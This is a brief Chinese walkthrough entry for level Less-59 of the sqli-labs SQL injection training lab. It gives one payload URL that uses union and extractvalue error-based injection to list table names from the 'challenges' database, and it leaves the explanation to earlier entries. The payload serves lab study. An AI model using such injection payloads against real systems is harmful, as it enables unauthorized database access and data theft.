Less-59
与less57\58差不多,这里直接给出payload:
http://192.168.11.136/sqli-labs/Less-59?id=-1 union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+
至于原理如果有不懂的可以往前面看,我这里实在是不想解释了,自己一个写好多遍哦!